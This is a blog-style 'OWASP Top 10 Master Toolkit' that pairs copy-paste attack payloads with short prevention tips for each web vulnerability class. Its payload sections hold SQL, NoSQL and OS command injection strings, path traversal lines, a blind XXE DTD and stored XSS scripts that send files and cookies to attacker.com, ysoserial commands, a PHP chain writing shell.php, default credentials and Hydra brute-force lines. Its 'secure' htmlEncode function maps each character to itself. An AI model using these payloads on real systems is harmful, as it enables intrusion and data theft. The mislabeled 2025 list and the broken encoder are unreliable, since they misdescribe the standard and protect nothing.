OWASP Top 10 Master Toolkit

By Write a Comment on OWASP Top 10 Master Toolkit21 min read

Complete Web Application Security Guide – 2025 & Latest Updates

🚀 Complete OWASP Top 10 Coverage – All vulnerabilities with detection, exploitation, and prevention

📚 Beginner to Expert – From basic understanding to advanced attack techniques

🛡️ Ethical Use Only – For authorized testing, security research, and bug bounty hunting

Ready-to-Use Payloads – Copy-paste tested payloads for all OWASP Top 10 vulnerabilities

🔍 Injection Flaws 🔓 Broken Auth 📊 Data Exposure 🌐 XXE Attacks 🛡️ Access Control ⚙️ Security Config 🔄 XSS Attacks 📦 Deserialization 🔧 Components 📝 Logging

🛡️ OWASP Top 10 Overview

🎯 OWASP Top 10 2025: The most critical web application security risks that every developer and security professional should know.

Complete Risk Matrix

A01: Injection

Risk: HIGH
SQL, NoSQL, OS, LDAP injection flaws occur when untrusted data is sent as part of a command or query.

A02: Broken Authentication

Risk: HIGH
Application functions related to authentication and session management are often implemented incorrectly.

A03: Sensitive Data Exposure

Risk: MEDIUM
APIs do not adequately protect sensitive data such as financial, healthcare, and PII.

A04: XML External Entities (XXE)

Risk: MEDIUM
Poorly configured XML processors evaluate external entity references within XML documents.

A05: Broken Access Control

Risk: HIGH
Restrictions on what authenticated users are allowed to do are often not properly enforced.

A06: Security Misconfiguration

Risk: MEDIUM
Security misconfiguration is the most commonly seen issue in web applications.

A07: Cross-Site Scripting (XSS)

Risk: HIGH
XSS flaws occur when an application includes untrusted data in a web page without proper validation.

A08: Insecure Deserialization

Risk: MEDIUM
Insecure deserialization often leads to remote code execution.

A09: Known Vulnerable Components

Risk: LOW-MEDIUM
Components run with the same privileges as the application itself.

A10: Insufficient Logging & Monitoring

Risk: LOW
Insufficient logging and monitoring, coupled with missing incident response.

Testing Methodology

OWASP Top 10 Testing Checklist:

1. Information Gathering
   - Reconnaissance
   - Technology stack identification
   - Entry point mapping

2. Authentication Testing
   - Weak password policies
   - Session management flaws
   - Multi-factor authentication bypass

3. Authorization Testing
   - Privilege escalation
   - Direct object references
   - Path traversal

4. Input Validation Testing
   - SQL injection
   - XSS vulnerabilities
   - Command injection
   - XXE attacks

5. Error Handling
   - Information disclosure
   - Stack traces
   - Error messages

6. Cryptography
   - Weak encryption
   - Insecure random numbers
   - Certificate validation

7. Business Logic Testing
   - Business rule bypass
   - Process flow manipulation
   - Data validation

8. Client-Side Testing
   - DOM-based XSS
   - JavaScript execution
   - HTML5 security

💉 A01: Injection Flaws

⚠️ High Risk: Injection flaws allow attackers to send hostile data to an interpreter as part of a command or query.

SQL Injection Detection

-- Basic SQL Injection Tests
'
"
`
')
")
`)
1'
1"
1`
' OR '1'='1
' OR '1'='1'--
' OR '1'='1'#
' UNION SELECT NULL--
' UNION SELECT 1,2,3--
'; DROP TABLE users--
' AND SLEEP(5)--
' AND WAITFOR DELAY '0:0:5'--

NoSQL Injection

// MongoDB Injection Payloads
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"$or": [{"username": "admin"}, {"username": "administrator"}]}
{"username": {"$in": ["admin", "administrator", "root"]}}

// CouchDB Injection
{"selector": {"username": {"$gt": null}}}
{"selector": {"$and": [{"username": {"$gte": ""}}, {"password": {"$gte": ""}}]}}

// JavaScript Injection in NoSQL
'; return true; var dummy='
'; return this.username == 'admin'; var dummy='

OS Command Injection

# Command Injection Payloads
; ls
& dir
| whoami
`id`
$(whoami)
; cat /etc/passwd
& type C:\Windows\System32\drivers\etc\hosts
| net user
; ps aux
& tasklist
|| id
; uname -a
& systeminfo
| cat /proc/version

# Time-based Detection
; sleep 10
& timeout 10
| ping -c 10 127.0.0.1
; ping -c 10 localhost

# Blind Command Injection
; nslookup burpcollaborator.net
& nslookup burpcollaborator.net
| curl http://attacker.com/$(whoami)

Prevention Methods

🛡️ Injection Prevention

  • Use Parameterized Queries: Always use prepared statements and parameterized queries
  • Input Validation: Validate all input using positive validation (whitelist)
  • Escape Special Characters: Properly escape all user-supplied data
  • Least Privilege: Use minimal database privileges for application accounts
  • Stored Procedures: Use stored procedures when possible

🔐 A02: Broken Authentication

⚠️ High Risk: Authentication and session management functions are often implemented incorrectly.

Weak Password Testing

# Common Default Passwords
admin:admin
admin:password
admin:123456
root:root
root:toor
administrator:password
user:user
guest:guest
demo:demo
test:test
admin:
:admin
admin:admin123
root:password
administrator:admin
sa:
oracle:oracle
mysql:mysql
postgres:postgres

Brute Force Payloads

# Hydra Commands
hydra -l admin -P passwords.txt http-post-form "/login:username=^USER^&password=^PASS^:Invalid"
hydra -L users.txt -P passwords.txt ssh://target.com
hydra -l admin -P passwords.txt ftp://target.com
hydra -L users.txt -P passwords.txt rdp://target.com

# Common Username Lists
admin
administrator
root
user
guest
demo
test
sa
oracle
mysql
postgres

Prevention Methods

🛡️ Authentication Security

  • Strong Password Policy: Enforce complex passwords and regular changes
  • Multi-Factor Authentication: Implement proper MFA for all accounts
  • Session Security: Use secure session management practices
  • Account Lockout: Implement account lockout after failed attempts
  • Secure Recovery: Implement secure password recovery mechanisms

📊 A03: Sensitive Data Exposure

⚠️ Medium Risk: Many web applications do not properly protect sensitive data such as financial and healthcare information.

Data Discovery Techniques

# Common Sensitive Files
/.env
/config.php
/wp-config.php
/database.yml
/settings.py
/.git/config
/.svn/entries
/backup.sql
/dump.sql
/phpinfo.php
/admin/config.php
/includes/config.inc.php
/application.properties
/web.config
/app.config
/.htaccess
/.htpasswd
/robots.txt
/sitemap.xml

Directory Traversal

# Path Traversal Payloads
../../../etc/passwd
..\..\..\..\windows\system32\drivers\etc\hosts
....//....//....//....//etc/passwd
..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%5c..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
..////..////..////..////etc//passwd
..\\\\..\\\\..\\\\..\\\\windows\\\\system32\\\\drivers\\\\etc\\\\hosts

Prevention Methods

🛡️ Data Protection

  • Encrypt Sensitive Data: Use strong encryption at rest and in transit
  • Minimize Data Storage: Don’t store sensitive data unnecessarily
  • Secure Transmission: Use HTTPS for all communications
  • Access Controls: Implement proper authorization for sensitive data
  • Data Classification: Classify and handle data according to sensitivity

📄 A04: XML External Entities (XXE)

⚠️ Medium Risk: Many older or poorly configured XML processors evaluate external entity references within XML documents.

Basic XXE Payloads

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///c:/windows/system32/drivers/etc/hosts"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

Blind XXE Payloads

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://attacker.com/malicious.dtd"> %xxe; ]>
<stockCheck><productId>1</productId></stockCheck>

<!-- External DTD file (malicious.dtd) -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

Prevention Methods

🛡️ XXE Prevention

  • Disable External Entities: Configure XML parsers to disable external entity processing
  • Input Validation: Validate and sanitize all XML input
  • Use Whitelists: Use whitelisting for XML schema validation
  • Update Libraries: Keep XML processing libraries up to date
  • Network Segmentation: Isolate XML processing from sensitive systems

🔓 A05: Broken Access Control

⚠️ High Risk: Restrictions on what authenticated users are allowed to do are often not properly enforced.

Insecure Direct Object References (IDOR)

# IDOR Testing
# Change IDs in URLs
/user/profile?id=1
/user/profile?id=2
/user/profile?id=3

# Change IDs in requests
POST /api/users/1 HTTP/1.1
POST /api/users/2 HTTP/1.1
POST /api/users/3 HTTP/1.1

# Test different ID formats
/user/123
/user/admin
/user/0001
/user/%2e%2e%2fadmin
/user/../admin

# UUID manipulation
/user/550e8400-e29b-41d4-a716-446655440000
/user/550e8400-e29b-41d4-a716-446655440001

# Base64 encoded IDs
/user/MTIz (123 in base64)
/user/YWRtaW4= (admin in base64)

Privilege Escalation

# Horizontal Privilege Escalation
# Access other users' data
GET /api/users/123/orders HTTP/1.1
GET /api/users/456/orders HTTP/1.1

# Vertical Privilege Escalation
# Try admin functions as regular user
GET /admin/users HTTP/1.1
POST /admin/delete-user HTTP/1.1
PUT /admin/change-role HTTP/1.1

# Parameter manipulation
POST /api/users HTTP/1.1
Content-Type: application/json

{
  "username": "newuser",
  "role": "admin",
  "isAdmin": true,
  "permissions": ["all"]
}

Prevention Methods

🛡️ Access Control Security

  • Implement Proper Authorization: Check permissions on every request
  • Use Indirect Object References: Use random IDs or hashes instead of predictable IDs
  • Principle of Least Privilege: Grant minimum necessary permissions
  • Rate Limiting: Implement rate limiting for sensitive operations
  • Logging and Monitoring: Log all access control failures

⚙️ A06: Security Misconfiguration

⚠️ Medium Risk: Security misconfiguration is the most commonly seen issue across all industries.

Common Misconfigurations

# Default credentials
admin:admin
admin:password
root:root
admin:123456
sa:
oracle:oracle
mysql:mysql
postgres:postgres

# Debug mode enabled
?debug=true
?test=true
?dev=true
X-Debug: 1
X-Test-Mode: 1

# Exposed configuration files
/.env
/config.php
/wp-config.php
/database.yml
/settings.py
/.git/config
/web.config
/app.config
/.htaccess
/phpinfo.php

Prevention Methods

🛡️ Configuration Security

  • Security Hardening: Follow security hardening guides for all components
  • Remove Defaults: Remove or change all default accounts and configurations
  • Regular Updates: Keep all software components up to date
  • Security Headers: Implement all relevant security headers
  • Error Handling: Implement custom error pages that don’t reveal information

🌐 A07: Cross-Site Scripting (XSS)

⚠️ High Risk: XSS flaws occur when an application includes untrusted data in a web page without proper validation.

Reflected XSS Payloads

<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
<script>alert(document.domain)</script>
<script>alert(window.origin)</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<iframe src="javascript:alert('XSS')"></iframe>
<body onload=alert('XSS')>
<details open ontoggle=alert('XSS')>
<marquee onstart=alert('XSS')>
javascript:alert('XSS')
'><script>alert('XSS')</script>
"><script>alert('XSS')</script>

Stored XSS Payloads

<script>
var img = new Image();
img.src = 'http://attacker.com/steal?cookie=' + document.cookie;
</script>

<script>
fetch('http://attacker.com/steal', {
    method: 'POST',
    body: JSON.stringify({
        cookie: document.cookie,
        localStorage: localStorage,
        sessionStorage: sessionStorage,
        url: window.location.href
    })
});
</script>

Filter Bypasses

# Case variation
<ScRiPt>alert('XSS')</ScRiPt>
<SCRIPT>alert('XSS')</SCRIPT>

# Encoding bypasses
&lt;script&gt;alert('XSS')&lt;/script&gt;
%3Cscript%3Ealert('XSS')%3C/script%3E
\u003cscript\u003ealert('XSS')\u003c/script\u003e

# Comments bypass
<script>/**/alert('XSS')/**/</script>
<scr<!--ipt>alert('XSS')</scr-->ipt>

Prevention Methods

🛡️ XSS Prevention

  • Output Encoding: Encode all output based on context (HTML, JavaScript, CSS, URL)
  • Input Validation: Validate all input using whitelist approach
  • Content Security Policy: Implement strict CSP headers
  • HTTPOnly Cookies: Use HttpOnly flag for session cookies
  • DOM Security: Use safe DOM manipulation methods

📦 A08: Insecure Deserialization

⚠️ Medium Risk: Insecure deserialization often leads to remote code execution.

Java Deserialization

# Java serialized object detection
# Look for base64 encoded data starting with:
rO0AB  (Java serialization magic bytes)
aced00 (hex representation)

# Common vulnerable libraries:
- Apache Commons Collections
- Spring Framework
- Groovy
- Apache Commons BeanUtils

# Payload generation tools:
ysoserial-master.jar
java -jar ysoserial-master.jar CommonsCollections1 'calc.exe' | base64
java -jar ysoserial-master.jar CommonsCollections1 'ping attacker.com' | base64

PHP Deserialization

# PHP Object Injection
# Look for serialized PHP objects:
O:4:"User":2:{s:8:"username";s:5:"admin";s:8:"password";s:5:"admin";}
a:2:{s:8:"username";s:5:"admin";s:8:"password";s:5:"admin";}

# Magic methods exploitation:
__construct()
__destruct()
__toString()
__wakeup()
__call()
__get()
__set()

# POP chain payloads:
O:10:"FileReader":1:{s:8:"filename";s:15:"/etc/passwd";}
O:9:"LogWriter":1:{s:7:"logfile";s:22:"/var/www/html/shell.php";}

Prevention Methods

🛡️ Deserialization Security

  • Avoid Deserialization: Don’t deserialize untrusted data when possible
  • Input Validation: Implement strict type checking before deserialization
  • Signature Verification: Use digital signatures to verify serialized data
  • Sandboxing: Run deserialization in restricted environments
  • Monitoring: Monitor and log deserialization activities

🔧 A09: Using Components with Known Vulnerabilities

⚠️ Low-Medium Risk: Components such as libraries, frameworks run with the same privileges as the application.

Vulnerability Scanning

# Node.js dependency scanning
npm audit
npm audit fix
yarn audit

# Python dependency scanning
pip-audit
safety check
bandit -r .

# Ruby dependency scanning
bundle audit
brakeman

# Java dependency scanning
mvn dependency-check:check
gradle dependencyCheckAnalyze

# PHP dependency scanning
composer audit
psalm --security-analysis

Common Vulnerable Components

# JavaScript libraries
jQuery < 3.5.0 (XSS vulnerabilities)
Lodash < 4.17.19 (Prototype pollution)
Moment.js < 2.29.2 (ReDoS)
Bootstrap < 4.1.2 (XSS)

# Java libraries
Apache Struts 2 (RCE vulnerabilities)
Spring Framework < 5.3.21 (RCE)
Log4j < 2.17.0 (Log4Shell RCE)
Jackson < 2.12.6 (Deserialization)

# PHP libraries
PHPMailer < 6.5.0 (RCE)
Laravel < 8.83.8 (Various vulnerabilities)
Symfony < 5.4.11 (Security issues)

# WordPress plugins (commonly exploited)
Yoast SEO (Various versions)
Contact Form 7 (File upload issues)
WooCommerce (Various vulnerabilities)

Prevention Methods

🛡️ Component Security

  • Inventory Management: Maintain an inventory of all components and versions
  • Regular Updates: Keep all components updated to latest secure versions
  • Vulnerability Monitoring: Monitor security advisories for used components
  • Automated Scanning: Use automated tools to detect vulnerable components
  • Minimal Dependencies: Use only necessary components and remove unused ones

📝 A10: Insufficient Logging & Monitoring

⚠️ Low Risk: Insufficient logging and monitoring, coupled with missing or ineffective incident response.

Log Injection Attacks

# CRLF injection in logs
username=admin%0d%0aINFO: User admin logged in successfully
username=test%0a%0d[CRITICAL] System compromised

# Log forging
username=admin%0d%0a[INFO] 127.0.0.1 - Admin logout successful%0d%0a[INFO] 127.0.0.1 - Admin login successful

# ANSI escape sequence injection
username=%1b[31mERROR: System hacked!%1b[0m
password=%1b[1;31mCRITICAL ALERT%1b[0m


# Multiple failed login attempts
username=admin&password=wrong1
username=admin&password=wrong2
username=admin&password=wrong3
(repeat 50+ times)

# SQL injection attempts
' OR 1=1--
'; DROP TABLE users--
' UNION SELECT * FROM information_schema.tables--

# Path traversal attempts
../../../etc/passwd
../../../../windows/system32/drivers/etc/hosts

# Command injection attempts
; whoami
& dir
| id

Prevention Methods

🛡️ Logging & Monitoring Best Practices

  • Comprehensive Logging: Log all security-relevant events with sufficient detail
  • Log Protection: Protect log files from unauthorized access and tampering
  • Real-time Monitoring: Implement real-time monitoring and alerting
  • Incident Response: Have a documented incident response plan
  • Log Analysis: Regularly analyze logs for security incidents

🛡️ Prevention & Secure Development

Secure Coding Practices

// Input validation and sanitization
function validateInput(input) {
    // Whitelist validation
    const allowedChars = /^[a-zA-Z0-9_-]+$/;
    if (!allowedChars.test(input)) {
        throw new Error('Invalid input');
    }
    return input;
}

// Output encoding
function htmlEncode(str) {
    return str.replace(/[&<>"']/g, function(match) {
        return {
            '&': '&',
            '<': '<',
            '>': '>',
            '"': '"',
            "'": '''
        }[match];
    });
}

Security Headers Implementation

# Essential Security Headers
Content-Security-Policy: default-src 'self'
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000; includeSubDomains
Referrer-Policy: strict-origin-when-cross-origin
Permissions-Policy: geolocation=(), microphone=(), camera=()

# Apache .htaccess implementation
Header always set Content-Security-Policy "default-src 'self'"
Header always set X-Frame-Options "DENY"
Header always set X-Content-Type-Options "nosniff"
Header always set X-XSS-Protection "1; mode=block"

🔧 Security Testing Tools

Automated Scanners

🕷️ OWASP ZAP

Free web application security scanner with GUI and API support

🔍 Burp Suite

Professional web security testing platform with extensive features

⚡ Nuclei

Fast vulnerability scanner based on templates

🎯 Nikto

Web server scanner for multiple vulnerabilities

Manual Testing Commands

# Command line tools
curl -X POST -d "username=admin&password=admin" http://target.com/login
wget --post-data="username=admin&password=admin" http://target.com/login
sqlmap -u "http://target.com/page.php?id=1" --dbs
wpscan --url http://target.com --enumerate ap,at,cb,dbe
nikto -h target.com
nuclei -u target.com

# Specialized Tools by Vulnerability
# SQL Injection: sqlmap, jSQL, bbqSQL, NoSQLMap
# XSS Testing: XSStrike, Dalfox, XSSHunter, beef-xss
# XXE Testing: XXEinjector, Burp XXE Scanner
# Deserialization: ysoserial, ysoserial.net, pickle-payload

🔒 Disclaimer: This toolkit is for educational and authorized testing purposes only. Use responsibly and only on systems you own or have explicit permission to test.

📧 Created for ethical hackers, security professionals, and developers to improve web application security.

Shyamini

Our talented content writer in the tech industry, brings creativity and expertise to her role. With a rich background in some of the world's top tech companies, she has contributed valuable content that resonates with readers, making her an essential part of our team.
View All Articles

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *